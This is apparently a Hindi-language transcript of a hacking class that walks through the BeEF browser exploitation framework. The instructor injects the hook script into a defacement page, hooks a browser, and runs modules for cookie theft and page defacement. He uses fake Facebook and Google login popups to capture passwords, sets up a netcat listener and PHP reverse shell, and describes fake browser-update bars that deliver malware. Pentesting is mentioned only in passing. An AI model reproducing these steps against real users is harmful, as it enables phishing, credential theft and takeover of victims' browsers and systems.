तो ब्राउज़र एक्सप्लोरेशन को हम लोग देखने वाले हैं आज थ्रू एक्सएसएस। तो बेसिकली अब ब्राउज़र एक्सप्लॉइट करने के लिए तो हम लोगों को बेसिकली कुछ और भी चीज़ें आनी चाहिए। फॉर एग्ज़ाम्पल कि जैसे कि आप लोगों को सिर्फ यहाँ पे ब्राउज़र को एक्सप्लॉइट करना है, तो अब ब्राउज़र को एक्सप्लॉइट कर तो लोगे बट स्टिल आप लोगों को पेनिट्रेशन टेस्टिंग आनी चाहिए। पेनिट्रेशन टेस्टिंग क्यों आनी चाहिए? क्योंकि वहाँ पे आप लोग इंटरनल चीज़ों को पेन टेस्ट कर रहे होते हैं। लाइक आप किसी के सिस्टम पे घुस जाओगे तो वहाँ पे आप लोगों को कई सारी ऐसी चीज़ें परफॉर्म करनी पड़ेंगी जो कि आप लोगों को नहीं मालूम है अभी, जैसे कि परसिस्टेंस कैसे क्रिएट करते हैं, प्रिविलेज एस्केलेरेट कैसे करते हैं, माइग्रेट कैसे होते हैं, ठीक है। तो ये सारी चीज़ें लाइक ऐसे और भी कई सारी चीज़ें होती हैं परसिस्टेंट्स में, सॉरी पोस्ट एक्सप्लॉयटेशंस वगैरह में। तो इसलिए वहाँ पे आप लोगों को उतना आना चाहिए। तो जस्ट हम लोग जाते हैं एक बार हमारे ब्राउज़र पे एंड यहाँ पे मैं आईपी खोल लेता हूँ एंड एज यू कैन सी कि हम लोग यहाँ पे आ गए। तो एंड यहाँ पे लो लेवल की सेटिंग्स, ओके। तो यहाँ पे एक मिनट, अच्छा DVW का पासवर्ड नहीं मांगा इस बार, क्या बात है? चलो नहीं मांगा तो अच्छी बात है, ओके। तो अभी हमको करना क्या है? अच्छा रिकॉर्डिंग डाली नहीं, सॉरी, वो एक्चुअली रिकॉर्डिंग में नहीं डाल पाया था। एक मिनट, स्पाइडी तुम एक बार वो जो रिकॉर्डिंग थी कल की जो मेरे को शेयर करी थी, एक बार बस वो वहाँ पे ग्रुप में डाल देना, ठीक है? और उसमें टाइटल दे देना कल। हाँ हाँ ठीक है कर दूंगा मैं। हाँ, एक्सेस पोस्ट एक्सप्लॉइटेशन डाल देना, ठीक है? हाँ हाँ ठीक है। ओके। तो अभी यहाँ पे आते हैं, बट सबसे पहले मैं आप लोगों को बता दूं कि एक्चुअल में ये बीफ एक्सेसेस क्या है, ये टूल क्या करता है, कैसे काम करता है एंड ऑल ओवर दीज थिंग्स, ठीक है? तो सबसे पहले मैं बता दूं कि एक्चुअल में बीफ है क्या। अगर आप यहाँ पे सर्च करते हो बीफ, ठीक है, अरे अच्छी यार, बीफ एक्सेसेस, ठीक है, ये सर्च करो तो यहाँ पे आपको मालूम चलेगा व्हाट इज बीफ इनकाले। तो यहाँ पे एक बेसिकली ये ब्राउजर एक्सप्लोइटेशन फ्रेमवर्क है, ठीक है, कि ये ब्राउजर्स को पेनिट्रेट करने के काम आता है, ब्राउजर्स की पेन टेस्टिंग में काम आता है ये, ठीक है, कि आपका वेब ब्राउजर कितना सेफ एंड सिक्योर है, ठीक है। तो इन सब चीज़ों में काम आता है ये, और ये काफ़ी ज़्यादा लाइक काफ़ी बड़ा टूल है, ठीक है। तो इसको एक्सप्लोर करो तुम लोग, काफ़ी अच्छी चीज़ है। तो यहाँ पे तो यहाँ पे हम लोग जाते हैं रिफ्लेक्टेड एक्सेसेस में। किसी से भी जा सकते हो, अगर आपको रिफ्लेक्टेड मिलता है देन यू कैन गो इन टू रिफ्लेक्टेड, एंड अगर आपको स्टोर्ड मिलता है तो यहाँ पे आप स्टोर में जाके लाइक कर सकते हो। बट इसको एक्चुअल में यूज़ में कैसे लेना है, ठीक है, और इसको सेटअप वगैरह कैसे करना है। तो सबसे पहले यहाँ पे मैं थोड़ा इसको लिटिल बिट जूम इन कर लेता हूँ ताकि आप लोगों को देखने में आसानी हो। तो यहाँ पे अगर बीफ -XSS डालोगे तो अगर ये ऐसा हो जाता है दैट मीन्स मेरे उसमें इंस्टॉल है। अगर आपके उसमें नहीं है तो जैसे आपको लिख देना है apt इंस्टॉल beef-xss, हिट एंटर एंड जस्ट यहाँ पे आपके पास आ जाएगा, ठीक है, यहाँ पे, ठीक है, जस्ट क्लियर कर देना। तो यहाँ पे इसको स्टार्ट कर दो सबसे पहले beef-xss एंड हिट एंटर। तो यहाँ पे मैंने ही पहले से इंस्टॉल कर लिया था, क्लास के पहले इंस्टॉल कर लिया था इसलिए। तो अब मैंने ये हाल ही में इंस्टॉल किया तो दैट्स वाई मेरे से पूछ रहे हैं कि ये तुम्हारे डिफ़ॉल्ट क्रेडेंशियल है, तुमको चेंज करना पड़ेगा क्रेडेंशियल। तो क्रेडेंशियल को मैं रख देता हूँ कुछ भी, मैंने रख दिया बीफ को, ठीक है। तो अब यहाँ पे आप देख सकते हो कि ये इसकी स्क्रिप्ट है जो हुक करती है, ठीक है। तो अब इसका एक पैनल खुलेगा, ओके, सो जस्ट वेट करते हैं, पैनल खुलेगा भी हमारे ब्राउज़र पे। कट करते हैं इसको, ठीक है, एंड जस्ट हम अपने इधर पे जाते हैं एंड जस्ट इसको पेस्ट एंड गो, इधर क्लिक करते हैं एंड यूज़र नेम एज अ बीफ एंड जो पासवर्ड आपने डाल रखा है वो यहाँ पे डाल देना है एंड ऑथेंटिकेट करेगा ये। एंड एज यू कैन सी कि यहाँ पे ऐसा इसका कुछ इंटरफेस है, ठीक है। तो यहाँ पे गेटिंग स्टार्टेड लिख रखा है, इसके बारे में तुम लोग और चीज़ें पढ़ सकते हो, ये क्या है कैसे काम करता है, तो यहाँ पे ये सारी चीज़ें पढ़ सकते हो, ठीक है।
अब इसको कह सकते हो आप लोग नेटवर्क पेन टेस्टिंग या पैकेट इंजेक्शन के साथ भी यूज में ले सकते हो, ठीक है। बट अभी हम लोग यहाँ पे वो करने नहीं वाले हैं क्योंकि वो हमारा पेनिट्रेशन टेस्टिंग के कोर्स का पार्ट है, तो इसको हम लोग यहाँ पे शो नहीं करेंगे, ठीक है। यहाँ पे हम लोग नॉर्मल सी चीज़ें देखेंगे कि हम लोग एक्सेस से कैसे किसी के ब्राउज़र को एक्सप्लॉइट करते हैं। तो यहाँ पे आपको करना कुछ नहीं, अगर आपके पास एक वेबसाइट है खुद का, देन आप लोग वहाँ पे इसकी स्क्रिप्ट्स को इंजेक्ट कर सकते हो। एज यू कैन सी कि ये स्क्रिप्ट, ओके। बट अगर नहीं है देन इट्स फाइन, आप इसको नॉर्मली स्क्रिप्ट टैग के साथ भी ये सीधा लगा के दे सकते हो, ओके। तो अभी हम करते क्या कि सपोज मैं एक वेबसाइट बना लेता हूँ, ठीक है, एक जस्ट नॉर्मल सी अपने ही लोकल सर्वर पे, ठीक है। तो लोकल सर्वर को स्टार्ट करने से पहले सर्विस टॉर ने अपाचे टू स्टार्ट, तो यहाँ पे स्टार्ट हो गया। अभी मैं अगर अपने लिनक्स की आईपी डालता हूँ यहाँ पे, तो यहाँ पे हैक्ड लिख के आ रहा है। अभी हैक्ड लिख के क्यों आ रहा है? क्योंकि जैसे मेरा डिफ़ॉल्ट पेज है, कहाँ का डिफ़ॉल्ट पेज है, ये मेरे काली लिनक्स वार www HTML एंड हेयर, ये अगर मैं इसको ओपन विथ विजुअल स्टूडियो कोड ओपन, तो यहाँ पे ये देखो ये लिख के आ रहा है, ठीक है। तो अगर जिसमें यहाँ पे एक लाइक वो कर दूँ, यहाँ पे एक नॉर्मल से यहाँ पे वो कर दूँ वेलकम, ठीक है। तो जस्ट वेट अ मिनट, ये नहीं करता हूँ मैं, करता क्या हूँ कि इसको, मेरा एक डिफेस पेज है, ठीक है। डिफेस पेज में यहाँ पे पेस्ट नहीं कर सकते क्या? चलो यहाँ से ही मैं कर लेता हूँ, सी डी पिक्चर्स एल एस, अच्छा यहाँ पे नहीं है, सी डी डॉट सी डी वीडियोस एल एस सी डी डी फेस पेजेस, तो यहाँ पे ये रहा। तो इसको हम सी पी कर देते हैं और आर एच इसको हमको कहाँ पे करना है, स्लैश वार स्लैश www/html, और इसको index.html से कर देना है, ठीक है, क्लियर। तो अभी अगर हम वापस जाते हैं ब्राउज़र पे और इसको रिफ्रेश करें, तो ये देखो एक नॉर्मल सा मेरा डिफेस पेज यहाँ पे आ गया है, ठीक है। तो अब ये एक जस्ट नॉर्मल सा अभी डिफेस पेज दिख रहा है। तो अब हम करते क्या है कि इसी पे हम लोग अपनी स्क्रिप्ट को इंजेक्ट कर देते हैं। जो हमारी यहाँ पे स्क्रिप्ट आई थी, कहाँ गई वो स्क्रिप्ट, सेट, आई गेस मैंने कॉपी कर रखी थी, ओके नहीं कॉपी कर रखी थी, ओके नो प्रॉब्लम, ठीक है। तो यहाँ पे बीफ एक्सेस को हम लोग वापस से लिख देते हैं। तो हुक, ये वाली स्क्रिप्ट से हमको हुक करना है, कॉपी कंट्रोल सी, ठीक है। तो हमारे पास यहाँ पे ये इसकी स्क्रिप्ट है। तो अब इसकी स्क्रिप्ट में हमको कुछ थोड़े बहुत चेंजेस करने हैं जस्ट, ओके, कंट्रोल वी, एंड इधर पे आना है 192.168.29.50, क्योंकि ये हमारे काली मशीन की आईपी एड्रेस है। तो वो काली मशीन पे रिवोर्ड हमको इसका लाइक जो भी इसको ओपन करे काली मशीन के हमको कनेक्शन चाहिए। तो यहाँ पे हमने डाल दिया। अब हम करते क्या कि हम जाते हैं यहाँ पे index.html है, इसको ओपन विथ हम करते क्या विजुअल स्टूडियो कोड ओपन, ठीक है। अब यहाँ पे ये कोड तो नहीं आना चाहिए था, एक बार वापस से खोलते हैं। ओपन विथ माउस पैड कर लेते हैं, ओके आ गया। तो यहाँ पे जैसे कि स्क्रिप्ट यहाँ पे ये सारे दिख रहे हैं, ये स्क्रिप्ट वगैरह बंद हो गई, ठीक है। तो ये थोड़ा लैग करेगा क्योंकि लाइक इसमें काफ़ी सारी चीज़ें यूज़ करी गई हैं, दैट्स वाई। अरे यार आई गेस हटा ही देता हूँ मैं, वरना इसको किसी और के साथ ओपन करता हूँ जो कंफर्टेबल हो। विजुअल स्टूडियो, इसमें इजीली ओपन हो जाएगा। डोंट सेव फाइल
ओपन फाइल, अदर लोकेशन, कंप्यूटर, वार, www, HTML, index.html, तो यहाँ पे खुल गया। ठीक है, तो अब इसमें ये स्क्रिप्ट जो है वो कहीं पे भी आप लोग इंजेक्ट कर दो। या डिफेस पेज थोड़ा कुछ ज़्यादा ही वो है, तो इसमें ये स्क्रिप्ट कहीं पे भी वो कर दो। ठीक है, जैसे कि आखिरी में यहाँ पे स्क्रिप्ट बंद हो रही है, तो यहाँ पे मैं इस स्क्रिप्ट को पेस्ट कर देता हूँ। ठीक है, ये हो गया एंड इसको मैं सेव कर देता हूँ। रिट्राई सुडो, पासवर्ड डाल दिया मैंने। पासवर्ड डालने के बाद जैसे इसको मिनिमाइज कर देता हूँ एंड जस्ट वहाँ पे हम वापस जाते हैं। तो अब यहाँ पे हमारी स्क्रिप्ट वो हो गई है। ठीक है, अब यहाँ पे देखो ऑनलाइन ब्राउज़र पे एक भी नहीं है। जैसे मैं इसको रिफ्रेश करूँगा तो यहाँ पे ऑनलाइन लिख के आ जाएगा। ठीक है, रिफ्रेश। ठीक, अभी मैंने यहाँ पे रिफ्रेश कर दिया इसको। अब यहाँ पे जाके देखते हैं, ये देखो ऑनलाइन ब्राउज़र एक आ गया ना यहाँ पे। अब ऑनलाइन ब्राउज़र आ चुका है, बस ये लोकली मैंने किया अपने लोकल नेटवर्क में। ठीक है, ये पोर्ट फॉरवर्डिंग की टेक्निक्स मैं आपको एक एट द एंड वाली क्लास में बोनस सेक्शन पे हम लोग बताऊंगा। ठीक है, जिसमें आप लोगों को मैं 2 मेथड बताऊंगा, जिसमें आप लोग पोर्ट मैप को यूज़ में ले सकते हो या ngrok को यूज़ में ले सकते हो, किसी को भी ले सकते हो। ngrok थोड़ा कह सकते हो फालतू है, फालतू नहीं कह सकते हो, वो आपकी ओरिजिनल आईपी को डिस्क्लोज कर देता है। दैट्स वाई अब हैकर उसको ले यूज़ में लेना बंद कर दिए हैं। ठीक है, दैट्स वाई। तो बाकी यहाँ पे अभी ये हो गया, यहाँ पे ब्राउज़र देख सकते हो। अब यहाँ पे जैसे कि इस पर क्लिक करोगे और यहाँ पे आपको इसकी सारी इन्फॉर्मेशन दिखेगी। ठीक है, यहाँ पे ये सारी इन्फॉर्मेशन से आप लोग गो थ्रू कर सकते हो। ठीक है, एंड यहाँ पे आपको कुछ भी कह सकते हो क्रिटिकल चीज़ें करनी है, लाइक आपको किसी का सिस्टम वगैरह हैक करना है, एनीथिंग यू वांट टू डू यू कैन। सो आपको करना क्या है, जस्ट कि यहाँ पे आपको कमांड्स जो इधर पे आना है। कमांड्स में आने के बाद यहाँ पे आप देख सकते हो कितने सारे आपको यहाँ पे मॉड्यूल्स दिख रहे हैं कमांड्स के। ओके, अब यहाँ पे आप लोग देख सकते हो ब्राउज़र, क्रोम एक्सटेंशन, डीबग, एक्सप्लॉइट, होस्ट, IPEC, मेटास्प्लॉइट, मैस्क, नेटवर्क, परसिस्टेंस, फोन गैप एंड यहाँ पे सोशल इंजीनियरिंग, जो कि मोस्ट ऑफ द टाइम यूज़ करी जाती है हैकर्स के द्वारा। तो अब मैं यहाँ पे कुछ चीज़ें आप लोगों को यूज़ करके दिखाने वाला हूँ। ठीक है, अगर आपको गो थ्रू करना है तो आप सबके बारे में यहाँ पे पढ़ सकते हो। ठीक है, यहाँ पे ये क्या है। ठीक है, एंड ऑल ओवर दीज थिंग्स, गेट कुकीज़ कर सकते हो, कुकीज़ को प्ले साउंड कर सकते हो। ठीक है, वेब कैम फ्लैश कर सकते हो, वेब कैम परमिशन चेक कर सकते हो। ठीक है, यहाँ पे दिस मॉड्यूल्स, तो ये अगर यहाँ पे आप एग्जीक्यूट करते हो तो यहाँ पे जाते हो तो यहाँ पे तो कुछ नहीं हुआ। ठीक है, चलो इससे तो कुछ नहीं हुआ। बाकी गेट कुकीज़ आप लोग ट्राई कर सकते हो। 1 मिनट, हम लोग कहाँ पे थे, वेब कैम परमिशन चेक, आई वॉज नॉट एबल टू ऐड ओके, सो यहाँ पे नॉट एबल बता रहा है। गेट कुकीज़ करते हैं, एग्जीक्यूट करते हैं और यहाँ पे कुछ यहाँ पे देखने को नहीं हुआ। देखा, एक जस्ट नॉर्मल था यहाँ पे। जैसे यहाँ पे कमांड पे जाते हो तो यहाँ पे बीफ हुक इसकी जस्ट कुकीज़ बता रहे, क्योंकि मैं अपने ब्राउज़र पे कोई कुकीज़ को सेव करता ही नहीं हूँ। ठीक है, पूरा लाइक कुकीज़ वगैरह मैंने क्लियर कर देता हूँ, क्योंकि मैं नहीं चाहता कि लाइक मेरी पर्सनल चीज़ें हैक हो जाएं। ओके, सो जस्ट अभी इसी की ब्राउज़र बीफ हुक की कुकीज़ ही खुलेंगी। ठीक है, एंड जस्ट अगर आपको कोई प्ले साउंड करनी तो साउंड का फाइल पाथ यहाँ पे दे सकते हो, जस्ट उसको WAV एक्सटेंशन में करना। ठीक है, देन यहाँ पे ऐसी और भी कई सारी चीज़ें, क्रिएट एन अलर्ट डायलॉग, जैसे कि यहाँ पे बीफ अलर्ट डायलॉग यहाँ पे लिख देते हैं हम, CHACK, हैक्ड बाय हैकर, एंड एग्जीक्यूट करोगे तो यहाँ पे जाके देखोगे तो यहाँ पे ये देखो आ गया ना, तो एक काइंड ऑफ अलर्ट करवा रहा है ये। ठीक है, तो यहाँ पे देख सकते हो। ठीक है, तो यहाँ पे आप लोग चेक कर सकते हो ऐसे कि आपका ब्राउज़र किन किन चीज़ों से अफेक्टेड है। ऐसे कई सारी यहाँ पे कमाल की चीज़ें हैं। ठीक है, जैसे कि और भी मैं अगर चीज़ें दिखाऊँ, क्रिएट प्रॉम्प्ट डायलॉग ने, डिटेक्ट पॉपअप, ब्लॉकर, रिडायरेक्ट ब्राउज़र। तो अब यहाँ पे अगर हम लिख दें राजपूत हैक्सर,
हियर, ठीक है। तो अब इसको लाइक एक डिफेसमेंट काइंड ऑफ रहेगा, तो जाके देखते हैं इस, तो इससे तो कुछ वो इफेक्ट नहीं पड़ा। यहाँ पे कुछ इफेक्ट नहीं पड़ा इससे। एंड आप लोग यहाँ पे रिप्लेस कंटेंट, न्यू फेविकॉन, अच्छा यहाँ पे न्यू टाइटल, डिफेसमेंट कंटेंट बीफ एग्जीक्यूट करा के देखते हैं। एंड यहाँ पे देखते हैं तो यहाँ पे बीफ जस्ट डिफेसमेंट का कंटेंट आ गया है, ठीक है। बाकी अगर आप लोग यहाँ पे कोई अदर अपना टैग्स वगैरह दे देते हो तो भी वहाँ पे आ जाएगा, ठीक है। तो बाकी वापस से रिफ्रेश कर लो तो वापस से सही हो जाएगा, ठीक है। तो बाकी यहाँ पे और ऐसे कई सारी चीज़ें हैं, ठीक है। MS ऑफिस, फायरफॉक्स एक्सटेंशन, एक्टिवएक्स, यहाँ पे कई सारी चीज़ें हैं जो कि आप लोग इसको पेन टेस्ट कर सकते हो, देख सकते हो आपका ब्राउज़र किन किन चीज़ों से वल्नरेबल है एंड उसको फिक्स कर सकते हो, ठीक है। हुक्ड डोमेन, तो यहाँ पे ऐसा कुछ है नहीं। तब यहाँ पे अच्छा क्रोम एक्सटेंशन, अब क्रोम एक्सटेंशन क्या है, गेट ऑल को कि इस क्रोम के लिए है यहाँ पे, ये तो हमारा क्रोम है नहीं, तो यहाँ पे कुछ खास नहीं है। एक्सप्लॉइट्स अगर हम देख लेते हैं तो एक्सप्लॉइट यहाँ पे कई सारे हैं, जैसे कि राउटर स्विच, अच्छा इधर से कुछ नहीं है, इनमें कुछ नहीं है। यहाँ पे देखोगे तो यहाँ पे है, जो भी है यहाँ पे ये सारे हैं। अब यहाँ पे इन सब एक्सप्लॉइट्स के बारे में आप लोग जानते होगे, तो आप लोग यहाँ पे ट्राई कर सकते हो, ठीक है। वेल यहाँ पे शेल शॉक जो है वो एक वल्नरेबिलिटी है, और हालांकि ये सारे ही जितने भी हैं ये सारे ही वल्नरेबिलिटी हैं, ठीक है। एक्चुअली सारों के बारे में तो मैं भी नहीं जानता हूँ। देन होस्ट पे आप लोग यहाँ पे डिटेक्ट एंटीवायरस कर सकते हो कि एंटीवायरस कौन सा है, यहाँ पे देख सकते हो, यहाँ पे कुछ हुआ नहीं है। एंड जस्ट यहाँ पे जाओगे तो आपको एंटीवायरस नॉट डिटेक्टेड, क्योंकि लिनक्स में एंटीवायरस नहीं होते हैं, ओके। एंड विंडोज़ में करोगे तो आप लोगों को विंडोज़ में मालूम चलेगा कि हाँ विंडोज़ डिफेंडर है वहाँ पे, एंड आप लोगों को मालूम चलेगा कि एक्चुअल में वहाँ पे और एक्स्ट्रा कौन सा है, जैसे कि कोई खेल कर रखते हैं, ठीक है। एंड यहाँ पे अवास्ट का रखते हैं, सो इन सब चीज़ों से कह सकते हो कि आप लोग चेक कर सकते हो, ठीक है। एंड यहाँ पे और भी ऐसे कई सारी चीज़ें हैं जो कि आप लोग पेन टेस्ट कर सकते हो, ठीक है। तो अभी अगर गेट इंटरनल आईपी, अब यहाँ पे इंटरनल आईपी कर सकते हो, एग्जीक्यूट करो, कमांड पे जाओ, जस्ट यहाँ पे इंटरनल आईपी शो नहीं हुआ, क्या बात है, ढंग से परफॉर्म नहीं हुआ क्या? ओके नो प्रॉब्लम। बाकी डिटेल्स पे जाओगे तो यहाँ नीचे नेटवर्क आईपी एड्रेस जो कि इंटरनल आईपी एड्रेस का डिस्क्लोज हो गया है, ठीक है। तो जस्ट नॉर्मल है। लॉग्स में अच्छा ये सारे लॉग्स हुए, अच्छा ये लॉग्स वगैरह बता रहे, राइट माउस का क्लिक हुआ है, कितने कहाँ कहाँ पे, वही सारी चीज़ें, ठीक है। लॉग्स वगैरह बनते जा रहे हैं। डिटेक्ट यूज़र एग्जीक्यूट किया, यहाँ पे जाके देखे कुछ हुआ नहीं, एंड यहाँ पे फेल अनसपोर्टेड ब्राउज़र, तो आई गेस कि ये किसी और ब्राउज़र के लिए बनाएंगे। तो यहाँ पे आप लोग ये सारी चीज़ें चेक कर सकते हो। मेक टेली अ फ़ोन कॉल, अब नंबर क्या कर दें, कुछ भी डाल दो नंबर यहाँ पे, अरे कुछ भी नहीं, मतलब 10 डिजिट का तो होना चाहिए, 1 2 3 4 5 6 7 8 9 10। एग्जीक्यूट किया तो यहाँ पे ये देखो अलाउ टू साइट, ये कॉल, चूज़ एप्लीकेशन, यहाँ पे किससे तुमको लाइक वो कराना है, ठीक है, कि कॉल किसको कराना है, ठीक है। तो यहाँ पे ऐसा हुआ, आई फ्रेम क्रिएटेड, ये आई फ्रेम के ज़रिए हुआ है, ठीक है। अब आई फ्रेम एक टैग है जो कि बेसिकली यूज़ किया जाता है HTML वगैरह में। एंड देन आप लोग यहाँ पे ऑल ओवर यहाँ पे सारी चीज़ों को देख सकते हो, जैसे कि मेटास्प्लॉइट का अगर मैं देखूँ तो ब्राउज़र ऑटोपोन यहाँ पे है। अगर हम एग्जीक्यूट करते हैं, एग्जीक्यूट, एंड यहाँ पे कुछ हुआ तो नहीं, हालांकि इसके बारे में मैंने कभी यूज़ किया तो नहीं। दिस मॉडल विल बी रीडायरेक्ट यूजर टू ऑटोपोन पोर्ट ऑन मेटास्प्लॉइट लिसनर एंड देन द रिले ऑन मेटास्प्लॉइट हैंडलर यूजिंग resulting shell. If the metasploit is loaded, this model will pop up the URL to pre-launch listener, otherwise enter the URL you would like to user to be redirect on। यहाँ पे बोल ही कहाँ रहा है रिडायरेक्ट करने के लिए। नेटवर्क से रिलेटेड यहाँ पे आप चीज़ें देख सकते हो, डिटेक्ट बर्प, डिटेक्ट यहाँ पे DNS ANS, डिटेक्ट टॉर पे है क्या बात है, टॉर पे नहीं है, टॉर पे तो है नहीं। एंड बाकी आप लोग यहाँ पे और ओवर फिंगरप्रिंट, लोकल नेटवर्क के बारे में आप लोग स्कैन कर सकते हो। यहाँ पे भी कुछ नहीं है।
तो इन सब चीज़ों से तो प्रोटेक्ट है। परसिस्टेंस, वर्डप्रेस एड एडमिनिस्ट्रेटर, मैन इन द ब्राउज़र अटैक, ठीक है, इसको ट्राई करते हैं। इसे देखता हूँ वल्नरेबल है कि नहीं मेरा ब्राउज़र। ब्राउज़र हुक मेथड एक्सएमएल HTTP, ओके। सो ब्राउज़र आई गेस मेरा वल्नरेबल है, यहाँ पे मेथड बताया गया। तो बाकी सोशल इंजीनियरिंग टेक्निक्स में आप लोग यहाँ पे देख सकते हो। बाकी फ़ोन गैप को आप लोग खुद कर सकते हो। अलर्ट यूज़र, मैसेज, बटन नेम, डन, एग्जीक्यूट करो, यहाँ पे जाओ, जस्ट वेट करो। हुआ नहीं क्या? ओके, फिर इसे सिक्योर होगा। बीप बीप करके ट्राई करते हैं, एग्जीक्यूट, बीप भी नहीं हुआ यहाँ पे। सो दैट मीन्स ये इन सब चीज़ों से तो प्रॉम्प्ट यूज़र, अब देखते हैं इससे वल्नरेबल है कि नहीं। ओके, इससे भी वल्नरेबल नहीं है। अपलोड फाइल, तो यहाँ पे फाइल अपलोड कर वगैरह सकते हो। फाइल पाथ कि आपका कहाँ पे है वो फाइल, एंड डेस्टिनेशन कि आपको कहाँ पे अपलोड करनी है, ठीक है। एग्जीक्यूट, तो कमांड, ऐसी तो कोई फाइल नहीं थी, दैट्स वाई। फिर बात सोशल इंजीनियरिंग पे आते हैं, ठीक है। सोशल इंजीनियरिंग यहाँ पे कह सकते हो कमाल की चीज़ें हैं। यहीं से हम लोग कह सकते हैं किसी के भी ब्राउज़र का या किसी के भी सिस्टम्स का एक्सेस ले सकते हैं, ठीक है। तो यहाँ पे मैं जस्ट दिखाता हूँ आप लोगों को, जैसे कि वर्चुअल मशीन चल रही मेरी, एंड एक और VM है मेरे पास। अच्छा, इसको बंद करना पड़ेगा, बंद करना पड़ेगा, ओके। वर्चुअल मशीन तो चल नहीं रही। इसके लिए मेरे को रियल लाइफ एक वो चाहिए था, ओके, ठीक है। तो आप लोग चाहो तो यहाँ पे लाइक अपने उसमें भी कर सकते हो, विंडोज़ वगैरह पे भी, ठीक है। यहाँ पे अभी मेरा विंडोज़ में ओपन नहीं कर सकता क्योंकि मैं एक ही टाइम पे एक वर्चुअल मशीन ही चला सकता हूँ, ठीक है। सो दैट्स वाई यहाँ पे मैं सिर्फ मेटास्प्लॉइट चला पा रहा हूँ, ठीक है। तो बाकी आप लोग यहाँ पे और ऐसे कई सारी चीज़ें, जैसे कि प्रेटी थेफ्ट काफ़ी ज़्यादा अच्छा है। यहाँ पे सोशल मीडिया की चीज़ें चुरा सकते हो, जैसे कि ये देखो फेसबुक का मैं गया, एग्जीक्यूट किया, एंड यहाँ पे फेसबुक का एक लॉगिन करने का आएगा। खुल जा, क्या बात है, इसे सिक्योर है मेरा ब्राउज़र, ऐसा कैसे हो सकता है? क्रोम तक में आ जाता है ये तो। हाँ, ये देखो आ गया। अच्छा, पहली बार में एग्जीक्यूट नहीं हुआ था। तो यहाँ पे आप लोग कुछ भी डाल के लॉगिन पे क्लिक करते हो तो प्लीज एंटर अ वैलिड यूज़र नेम। अच्छा, मेरा ब्राउज़र थोड़ा लैग हो रहा है, ठीक है, दैट्स वाई यहाँ पे ऐसा हो रहा है, ठीक है, क्योंकि यहाँ पे मैंने कुछ ज़्यादा ही हैवी चीज़ें यहाँ पे मैं ये यूज़ कर रहा हूँ, ठीक है। अगर जैसे कि मैं यहाँ पे इस पे यूज़ करता हूँ अपनी जो जो भी चीज़ें हैं, पेस्ट, सबमिट, ठीक है। तो यहाँ पे अगर मैं प्रेटी थेफ्ट को एग्जीक्यूट कराता हूँ और इधर पे जाता हूँ, कहाँ गया कमांड्स, इधर पे, हाँ, तो एक ब्राउज़र ऑफलाइन चला गया जो पुराने टैब में था, पुराने टैब, ठीक है, उस वेबसाइट पे। तो अगर इस पर मैं डिटेल्स पे आऊँ तो यहाँ पे देखोगे, तो यहाँ पे देखो डैम वल्नरेबल वेब एप्लीकेशन इस टैब का है, ये देखो इधर का, ठीक है। तो अभी अगर हम इधर पे प्रिटी थेफ्ट चलाते हैं, एग्जीक्यूट, यहाँ पे गए तो यहाँ पे देखो आ गया। अब यहाँ पे मैं लॉगिन कर पा रहा हूँ, ठीक है, hacker@gmail.com। पासवर्ड में दे देता हूँ hacker123 एंड जस्ट लॉगिन पे क्लिक किया मैं। तो यहाँ पे आप लोगों को देखने को मिलेगा कि यहाँ पे कमांड पे 1 पे जाओगे तो यहाँ पे देखो आंसर hacker@gmail.com एंड hacker123 इज माई पासवर्ड, ठीक है। तो ये यहाँ पे आप लोग ट्राई कर सकते हो। एंड देन इसको थोड़ा और यहाँ पे ऐसे कर लेता हूँ। एंड फेक नोटिफिकेशन बार से ही हैकर किसी के भी सिस्टम पे एक्सेस ले लेते हैं। तो अब कैसे लेते हैं वो मैं दिखाता हूँ। यहाँ पे मैं पहले नेटकैट पे एक लिसनर ऑन कर लेता हूँ, -NLVP, ठीक है। हिट एंटर 4455 में मैं ओपन कर दिया इसको।
एंड यहाँ पे मैं एक रिवर्स शेल का पेलोड जनरेट कर लेता हूँ, ठीक है। PHP का ठीक है। एक पाइथन सर्वर क्रिएट करना पड़ेगा। ठीक है, तो मैं अपने शेल वाले फोल्डर्स में जाके पाइथन का सर्वर क्रिएट कर देता हूँ। तो यहाँ पे कौन सा शेल है मेरा जो नहीं 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 नहीं, सोशल मीडिया हैकिंग नहीं सिखा रहा मैं। ये ब्राउज़र को कैसे हैक करते हैं, ठीक है, वो सिखा रहा हूँ यहाँ पे। ये सारी चीज़ें ब्राउज़र पे ही होंगी, ठीक है। सोशल मीडिया हैकिंग, हाँ, ब्राउज़र को अगर तुम हैक कर सकते हो, हुक कर लेते हो बीफ में, तो वहाँ से सोशल मीडिया भी चुरा सकते हो, ठीक है। तो यहाँ पे हालांकि रुको, कैसे दिखाऊँ, पहले रुको गूगल फिशिंग देख लेते हैं, गूगल की फिशिंग कैसे करते हैं, ठीक है। तो यहाँ पे मैं एग्जीक्यूट करता हूँ और वापस यहाँ पे जाता हूँ। तो यहाँ पे अभी देखो, ये देखो गूगल मेल की फिशिंग हो गई यहाँ पे, ठीक है, ये सारी चीज़ें। तो यहाँ पे पूछेगा यूज़र नेम, अगर मैं क्या hacker@gmail पासवर्ड में यहाँ पे दे देता हूँ hacker12@123, साइन इन पे क्लिक किया तो ये यहाँ पे उस चीज़ पे रिडायरेक्ट कर देगा जहाँ पे आप लोग पहले थे। हालांकि ये भी मेरा गया ऑफलाइन, ठीक है। ये किसका है, अच्छा, अरे तो विंडोज़ का आईपी है, ठीक है। यहाँ पे ये, हाँ, DVW का, ओके। तो यहाँ पे हमारे पास, अगर हम वापस से जाते हैं यहाँ पे और सोशल इंजन पे गए थे और गूगल फिशिंग पे गए थे, कमांड 1, ये देखो हैकर यहाँ पे आ गया हमारे पास, ठीक है। यूज़र नेम ये। तो ऐसे आप लोग यहाँ पे कई सारी चीज़ें कर सकते हो। तो हैकर एक्सेस कैसे लेते हैं किसी के ब्राउज़र वगैरह का या ऑल ओवर दीज थिंग्स का, ठीक है, वो हम जानते हैं। तो वहाँ पे जस्ट तो वहाँ पे वो लोग कर देंगे कि यहाँ पे ये लोग फेक नोटिफिकेशन बार यूज़ करते हैं, जैसे क्रोम हो गया, फायरफॉक्स हो गया। तो यहाँ पे वो प्लगइन का यूआरएल और नोटिफिकेशन पे क्या लिख देते हैं, यहाँ पे कुछ भी, इंस्टॉल दिस अपडेट टू गेट अप अपडेट योर फायरफॉक्स, टू अपडेट योर फायरफॉक्स, ठीक है। और यहाँ पे वो मालवेयर को कहीं ऑनलाइन वो अपलोड कर देते हैं, या जैसे कि अगर कोई भी हम लोग यहाँ पे मालवेयर 